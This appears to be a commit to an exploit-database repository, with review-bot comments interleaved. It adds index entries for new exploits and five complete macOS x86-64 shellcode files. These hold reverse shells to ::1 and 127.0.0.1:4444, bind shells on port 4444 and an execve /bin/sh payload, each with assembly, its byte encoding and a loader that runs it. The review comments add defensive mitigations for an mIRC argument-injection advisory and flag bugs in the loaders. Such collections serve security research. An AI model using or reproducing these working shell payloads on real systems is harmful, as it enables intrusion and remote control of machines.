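Review bot: The advisory states that the configuration file is loaded from an attacker-controlled file server over a UNC path, but gives no mitigation or detection guidance for sites that cannot upgrade to 7.55 immediately. A short `Mitigations` section following from the text above — block outbound TCP/445 at the perimeter (which also prevents the remote `mirc.ini` load), unregister the `irc://` and `ircs://` handlers on hosts where mIRC is not needed, and alert on mIRC being launched with a `-i` argument that points at a UNC path — would make the entry actionable for defenders. The line `Usingavailable command-line parameters` is also missing a space.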


@ -6315,6 +6315,13 @@ id,file,description,date,author,type,platform,port
46383,exploits/windows/dos/46383.py,"Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)",2019-02-15,"Victor Mondragón",dos,windows,
46385,exploits/windows/dos/46385.py,"VSCO 1.1.1.0 - Denial of Service (PoC)",2019-02-15,0xB9,dos,windows,
46388,exploits/linux/dos/46388.txt,"Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference",2019-02-15,"Google Security Research",dos,linux,
46390,exploits/windows/dos/46390.py,"Realterm Serial Terminal 2.0.0.70 - Denial of Service",2019-02-18,"Alejandra Sánchez",dos,windows,
46391,exploits/windows/dos/46391.py,"Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)",2019-02-18,"Alejandra Sánchez",dos,windows,
46403,exploits/windows/dos/46403.py,"NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)",2019-02-18,"Alejandra Sánchez",dos,windows,
46409,exploits/java/dos/46409.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour",2019-02-18,"Google Security Research",dos,java,
46410,exploits/java/dos/46410.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions",2019-02-18,"Google Security Research",dos,java,
46411,exploits/java/dos/46411.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass",2019-02-18,"Google Security Research",dos,java,
46412,exploits/java/dos/46412.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process",2019-02-18,"Google Security Research",dos,java,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17185,6 +17192,7 @@ id,file,description,date,author,type,platform,port
46339,exploits/osx/remote/46339.rb,"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)",2019-02-11,Metasploit,remote,osx,
46340,exploits/php/remote/46340.rb,"NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)",2019-02-11,Metasploit,remote,php,80
46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,
46392,exploits/windows/remote/46392.txt,"mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers",2019-02-18,ProofOfCalc,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40851,3 +40859,15 @@ id,file,description,date,author,type,platform,port
46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,
46387,exploits/php/webapps/46387.txt,"qdPM 9.1 - 'search_by_extrafields[]' SQL Injection",2019-02-15,"Mehmet EMIROGLU",webapps,php,80
46389,exploits/php/webapps/46389.py,"UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload",2019-02-15,"Mohammad Danish",webapps,php,80
46398,exploits/php/webapps/46398.txt,"qdPM 9.1 - 'type' Cross-Site Scripting",2019-02-18,"Mehmet EMIROGLU",webapps,php,80
46399,exploits/php/webapps/46399.txt,"qdPM 9.1 - 'search[keywords]' Cross-Site Scripting",2019-02-18,"Mehmet EMIROGLU",webapps,php,80
46400,exploits/cgi/webapps/46400.py,"Master IP CAM 01 3.3.4.2103 - Remote Command Execution",2019-02-18,"Raffaele Sabato",webapps,cgi,80
46401,exploits/php/webapps/46401.py,"MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module",2019-02-18,Tm9jdGlz,webapps,php,80
46402,exploits/php/webapps/46402.txt,"CMSsite 1.0 - 'post' SQL Injection",2019-02-18,"Mr Winst0n",webapps,php,80
46404,exploits/multiple/webapps/46404.py,"M/Monit 3.7.2 - Privilege Escalation",2019-02-18,"Dolev Farhi",webapps,multiple,
46405,exploits/php/webapps/46405.txt,"Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload",2019-02-18,"Mehmet EMIROGLU",webapps,php,80
46406,exploits/multiple/webapps/46406.txt,"Apache CouchDB 2.3.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,
46407,exploits/multiple/webapps/46407.txt,"ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,
46408,exploits/multiple/webapps/46408.txt,"Comodo Dome Firewall 2.7.0 - Cross-Site Scripting",2019-02-18,"Ozer Goker",webapps,multiple,
46413,exploits/jsp/webapps/46413.txt,"Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload",2019-02-18,"Dao Duy Hung",webapps,jsp,
46414,exploits/php/webapps/46414.php,"WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing",2019-02-18,GeekHack,webapps,php,80



@ -940,3 +940,8 @@ id,file,description,date,author,type,platform
46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86
46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86
46323,shellcodes/linux_x86/46323.py,"Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)",2019-02-05,"Aditya Chaudhary",shellcode,linux_x86
46393,shellcodes/macos/46393.c,"macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46394,shellcodes/macos/46394.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46395,shellcodes/macos/46395.c,"macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos

1 id file description date author type platform
940 46277 shellcodes/linux_x86/46277.c Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes) 2019-01-29 Joao Batista shellcode linux_x86
941 46302 shellcodes/linux_x86/46302.c Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3) 2019-02-01 Kiewicz shellcode linux_x86
942 46323 shellcodes/linux_x86/46323.py Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator) 2019-02-05 Aditya Chaudhary shellcode linux_x86
943 46393 shellcodes/macos/46393.c macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes) 2019-02-18 Ken Kitahara shellcode macos
944 46394 shellcodes/macos/46394.c macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes) 2019-02-18 Ken Kitahara shellcode macos
945 46395 shellcodes/macos/46395.c macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2019-02-18 Ken Kitahara shellcode macos
946 46396 shellcodes/macos/46396.c macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes) 2019-02-18 Ken Kitahara shellcode macos
947 46397 shellcodes/macos/46397.c macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) 2019-02-18 Ken Kitahara shellcode macos

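--- a/shellcodes/macos/46393.c
+++ b/shellcodes/macos/46393.c
@@ -0,0 +1,111 @@
+/*
+# Title: macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
+# Date: 2019-02-17
+# Tested: macOS 10.14.1
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+dev:works devuser$ sw_vers
+ProductName: Mac OS X
+ProductVersion: 10.14.1
+BuildVersion: 18B75
+dev:works devuser$ cat ipv6rev.s
+section .text
+global start
+start:
+; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
+xor rdi, rdi
+mul rdi
+mov dil, 0x1e
+xor rsi, rsi
+mov sil, 0x1
+mov al, 0x2
+ror rax, 0x28
+mov r8, rax
+mov al, 0x61
+syscall
+; struct sockaddr_in6 {
+; __uint8_t sin6_len;
+; sa_family_t sin6_family;
+; in_port_t sin6_port;
+; __uint32_t sin6_flowinfo;
+; struct in6_addr sin6_addr;
+; __uint32_t sin6_scope_id;
+; };
+xor rsi, rsi
+push rsi
+mov rbx, 0xfeffffffffffffff
+not rbx
+push rbx
+push rsi
+mov rsi, 0xffffffffa3eee1e4
+neg rsi
+push rsi
+push rsp
+pop rsi
+; connect(sockid, &sockaddr, 28)
+mov rdi, rax
+xor dl, 0x1c
+mov rax, r8
+mov al, 0x62
+syscall
+xor rsi, rsi
+mov sil, 0x3
+dup2:
+; dup2(sockid, 2)
+; -> dup2(sockid, 1)
+; -> dup2(sockid, 0)
+mov rax, r8
+mov al, 0x5a
+sub sil, 1
+syscall
+test rsi, rsi
+jne dup2
+; execve("//bin/sh", 0, 0)
+push rsi
+mov rdi, 0x68732f6e69622f2f
+push rdi
+push rsp
+pop rdi
+xor rdx, rdx
+mov rax, r8
+mov al, 0x3b
+syscall
+dev:works devuser$ nasm -f macho64 -o ipv6rev.o ipv6rev.s && ld -macosx_version_min 10.7.0 -o ipv6rev ipv6rev.o
+dev:works devuser$ for i in $(objdump -d ./ipv6rev.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
+\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x48\xbb\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd3\x53\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05
+dev:works devuser$
+*/
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+int (*sc)();
+char shellcode[] =
+"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x48\xbb\xff\xff\xff\xff\xff\xff\xff\xfe\x48\xf7\xd3\x53\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05";
+int main(int argc, char **argv) {
+printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+if (ptr == MAP_FAILED) {
+perror("mmap");
+exit(-1);
+}
+memcpy(ptr, shellcode, sizeof(shellcode));
+sc = ptr;
+sc();
+return 0;
+}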
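Review bot: The mmap call in main requests only 0x22 (34) bytes, yet the memcpy two lines later copies sizeof(shellcode), which is 120 bytes for this array; the write lands past the requested length and only works because the kernel rounds the mapping up to a page, so the size should be tied to the array, `void *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);`. The identical loader with the same constant is repeated in 46394.c (130 bytes), 46395.c (104 bytes) and 46396.c (124 bytes); 46397.c fits in 34 bytes only because its array is 32 bytes. The printf on the first line of main formats the size_t returned by strlen with `%zd`, where `%zu` is the matching specifier. `int (*sc)();` declares a function pointer without a prototype and `sc = ptr;` converts a void pointer to it implicitly; `int (*sc)(void);` and `sc = (int (*)(void))ptr;` state the intent explicitly.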

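--- a/shellcodes/macos/46394.c
+++ b/shellcodes/macos/46394.c
@@ -0,0 +1,122 @@
+/*
+# Title: macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
+# Date: 2019-02-17
+# Tested: macOS 10.14.1
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+dev:works devuser$ sw_vers
+ProductName: Mac OS X
+ProductVersion: 10.14.1
+BuildVersion: 18B75
+dev:works devuser$ cat ipv6bind.s
+section .text
+global start
+start:
+; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
+xor rdi, rdi
+mul rdi
+mov dil, 0x1e
+xor rsi, rsi
+mov sil, 0x1
+mov al, 0x2
+ror rax, 0x28
+mov r8, rax
+mov al, 0x61
+syscall
+; struct sockaddr_in6 {
+; __uint8_t sin6_len;
+; sa_family_t sin6_family;
+; in_port_t sin6_port;
+; __uint32_t sin6_flowinfo;
+; struct in6_addr sin6_addr;
+; __uint32_t sin6_scope_id;
+; };
+xor rsi, rsi
+push rsi
+push rsi
+push rsi
+mov rsi, 0xffffffffa3eee1e4
+neg rsi
+push rsi
+push rsp
+pop rsi
+; bind(host_sockid, &sockaddr, 28)
+mov rdi, rax
+xor dl, 0x1c
+mov rax, r8
+mov al, 0x68
+syscall
+; listen(host_sockid, 2)
+xor rsi, rsi
+mov sil, 0x2
+mov rax, r8
+mov al, 0x6a
+syscall
+; accept(host_sockid, 0, 0)
+xor rsi, rsi
+xor rdx, rdx
+mov rax, r8
+mov al, 0x1e
+syscall
+mov rdi, rax
+mov sil, 0x3
+; dup2(client_sockid, 2)
+; -> dup2(client_sockid, 1)
+; -> dup2(client_sockid, 0)
+dup2:
+mov rax, r8
+mov al, 0x5a
+sub sil, 1
+syscall
+test rsi, rsi
+jne dup2
+; execve("//bin/sh", 0, 0)
+push rsi
+mov rdi, 0x68732f6e69622f2f
+push rdi
+push rsp
+pop rdi
+mov rax, r8
+mov al, 0x3b
+syscall
+dev:works devuser$ nasm -f macho64 -o ipv6bind.o ipv6bind.s && ld -macosx_version_min 10.7.0 -o ipv6bind ipv6bind.o
+dev:works devuser$ for i in $(objdump -d ./ipv6bind.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
+\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x56\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x68\x0f\x05\x48\x31\xf6\x40\xb6\x02\x4c\x89\xc0\xb0\x6a\x0f\x05\x48\x31\xf6\x48\x31\xd2\x4c\x89\xc0\xb0\x1e\x0f\x05\x48\x89\xc7\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x4c\x89\xc0\xb0\x3b\x0f\x05
+dev:works devuser$
+*/
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+int (*sc)();
+char shellcode[] =
+"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x1e\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\x31\xf6\x56\x56\x56\x48\xc7\xc6\xe4\xe1\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x1c\x4c\x89\xc0\xb0\x68\x0f\x05\x48\x31\xf6\x40\xb6\x02\x4c\x89\xc0\xb0\x6a\x0f\x05\x48\x31\xf6\x48\x31\xd2\x4c\x89\xc0\xb0\x1e\x0f\x05\x48\x89\xc7\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x4c\x89\xc0\xb0\x3b\x0f\x05";
+int main(int argc, char **argv) {
+printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+if (ptr == MAP_FAILED) {
+perror("mmap");
+exit(-1);
+}
+memcpy(ptr, shellcode, sizeof(shellcode));
+sc = ptr;
+sc();
+return 0;
+}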

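--- a/shellcodes/macos/46395.c
+++ b/shellcodes/macos/46395.c
@@ -0,0 +1,104 @@
+/*
+# Title: macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
+# Date: 2019-02-17
+# Tested: macOS 10.14.1
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+dev:works devuser$ sw_vers
+ProductName: Mac OS X
+ProductVersion: 10.14.1
+BuildVersion: 18B75
+dev:works devuser$ cat ipv4rev.s
+section .text
+global start
+start:
+; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)
+xor rdi, rdi
+mul rdi
+mov dil, 0x2
+xor rsi, rsi
+mov sil, 0x1
+mov al, 0x2
+ror rax, 0x28
+mov r8, rax
+mov al, 0x61
+syscall
+; struct sockaddr_in {
+; __uint8_t sin_len;
+; sa_family_t sin_family;
+; in_port_t sin_port;
+; struct in_addr sin_addr;
+; char sin_zero[8];
+; };
+mov rsi, 0xfeffff80a3eefdf0
+neg rsi
+push rsi
+push rsp
+pop rsi
+; connect(sockid, &sockaddr, 16)
+mov rdi, rax
+xor dl, 0x10
+mov rax, r8
+mov al, 0x62
+syscall
+xor rsi, rsi
+mov sil, 0x3
+dup2:
+; dup2(sockid, 2)
+; -> dup2(sockid, 1)
+; -> dup2(sockid, 0)
+mov rax, r8
+mov al, 0x5a
+sub sil, 1
+syscall
+test rsi, rsi
+jne dup2
+; execve("//bin/sh", 0, 0)
+push rsi
+mov rdi, 0x68732f6e69622f2f
+push rdi
+push rsp
+pop rdi
+xor rdx, rdx
+mov rax, r8
+mov al, 0x3b
+syscall
+dev:works devuser$ nasm -f macho64 -o ipv4rev.o ipv4rev.s && ld -macosx_version_min 10.7.0 -o ipv4rev ipv4rev.o
+dev:works devuser$ for i in $(objdump -d ./ipv4rev.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
+\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xbe\xf0\xfd\xee\xa3\x80\xff\xff\xfe\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05
+dev:works devuser$
+*/
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+int (*sc)();
+char shellcode[] =
+"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xbe\xf0\xfd\xee\xa3\x80\xff\xff\xfe\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05";
+int main(int argc, char **argv) {
+printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+if (ptr == MAP_FAILED) {
+perror("mmap");
+exit(-1);
+}
+memcpy(ptr, shellcode, sizeof(shellcode));
+sc = ptr;
+sc();
+return 0;
+}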

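--- a/shellcodes/macos/46396.c
+++ b/shellcodes/macos/46396.c
@@ -0,0 +1,117 @@
+/*
+# Title: macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
+# Date: 2019-02-17
+# Tested: macOS 10.14.1
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+dev:works devuser$ sw_vers
+ProductName: Mac OS X
+ProductVersion: 10.14.1
+BuildVersion: 18B75
+dev:works devuser$ cat ipv4bind.s
+section .text
+global start
+start:
+; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)
+xor rdi, rdi
+mul rdi
+mov dil, 0x2
+xor rsi, rsi
+mov sil, 0x1
+mov al, 0x2
+ror rax, 0x28
+mov r8, rax
+mov al, 0x61
+syscall
+; struct sockaddr_in {
+; __uint8_t sin_len;
+; sa_family_t sin_family;
+; in_port_t sin_port;
+; struct in_addr sin_addr;
+; char sin_zero[8];
+; };
+mov rsi, 0xffffffffa3eefdf0
+neg rsi
+push rsi
+push rsp
+pop rsi
+; bind(host_sockid, &sockaddr, 16)
+mov rdi, rax
+xor dl, 0x10
+mov rax, r8
+mov al, 0x68
+syscall
+; listen(host_sockid, 2)
+xor rsi, rsi
+mov sil, 0x2
+mov rax, r8
+mov al, 0x6a
+syscall
+; accept(host_sockid, 0, 0)
+xor rsi, rsi
+xor rdx, rdx
+mov rax, r8
+mov al, 0x1e
+syscall
+mov rdi, rax
+mov sil, 0x3
+dup2:
+; dup2(client_sockid, 2)
+; -> dup2(client_sockid, 1)
+; -> dup2(client_sockid, 0)
+mov rax, r8
+mov al, 0x5a
+sub sil, 1
+syscall
+test rsi, rsi
+jne dup2
+; execve("//bin/sh", 0, 0)
+push rsi
+mov rdi, 0x68732f6e69622f2f
+push rdi
+push rsp
+pop rdi
+mov rax, r8
+mov al, 0x3b
+syscall
+dev:works devuser$ nasm -f macho64 -o ipv4bind.o ipv4bind.s && ld -macosx_version_min 10.7.0 -o ipv4bind ipv4bind.o
+dev:works devuser$ for i in $(objdump -d ./ipv4bind.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
+\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xc7\xc6\xf0\xfd\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x68\x0f\x05\x48\x31\xf6\x40\xb6\x02\x4c\x89\xc0\xb0\x6a\x0f\x05\x48\x31\xf6\x48\x31\xd2\x4c\x89\xc0\xb0\x1e\x0f\x05\x48\x89\xc7\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x4c\x89\xc0\xb0\x3b\x0f\x05
+dev:works devuser$
+*/
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+int (*sc)();
+char shellcode[] =
+"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xc7\xc6\xf0\xfd\xee\xa3\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x68\x0f\x05\x48\x31\xf6\x40\xb6\x02\x4c\x89\xc0\xb0\x6a\x0f\x05\x48\x31\xf6\x48\x31\xd2\x4c\x89\xc0\xb0\x1e\x0f\x05\x48\x89\xc7\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x4c\x89\xc0\xb0\x3b\x0f\x05";
+int main(int argc, char **argv) {
+printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+if (ptr == MAP_FAILED) {
+perror("mmap");
+exit(-1);
+}
+memcpy(ptr, shellcode, sizeof(shellcode));
+sc = ptr;
+sc();
+return 0;
+}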

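--- a/shellcodes/macos/46397.c
+++ b/shellcodes/macos/46397.c
@@ -0,0 +1,61 @@
+/*
+# Title: macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
+# Date: 2019-02-17
+# Tested: macOS 10.14.1
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+dev:works devuser$ sw_vers
+ProductName: Mac OS X
+ProductVersion: 10.14.1
+BuildVersion: 18B75
+dev:works devuser$ cat binsh.s
+section .text
+global start
+start:
+; execve("//bin/sh", 0, 0)
+xor rax, rax
+cdq
+push rax
+mov rdi, 0x68732f6e69622f2f
+push rdi
+push rsp
+pop rdi
+xor rsi, rsi
+mov al, 0x2
+ror rax, 0x28
+mov al, 0x3b
+syscall
+dev:works devuser$ nasm -f macho64 -o binsh.o binsh.s && ld -macosx_version_min 10.7.0 -o binsh binsh.o
+dev:works devuser$ for i in $(objdump -d ./binsh.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
+\x48\x31\xc0\x99\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xf6\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05
+dev:works devuser$
+*/
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+int (*sc)();
+char shellcode[] =
+"\x48\x31\xc0\x99\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xf6\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05";
+int main(int argc, char **argv) {
+printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+if (ptr == MAP_FAILED) {
+perror("mmap");
+exit(-1);
+}
+memcpy(ptr, shellcode, sizeof(shellcode));
+sc = ptr;
+sc();
+return 0;
+}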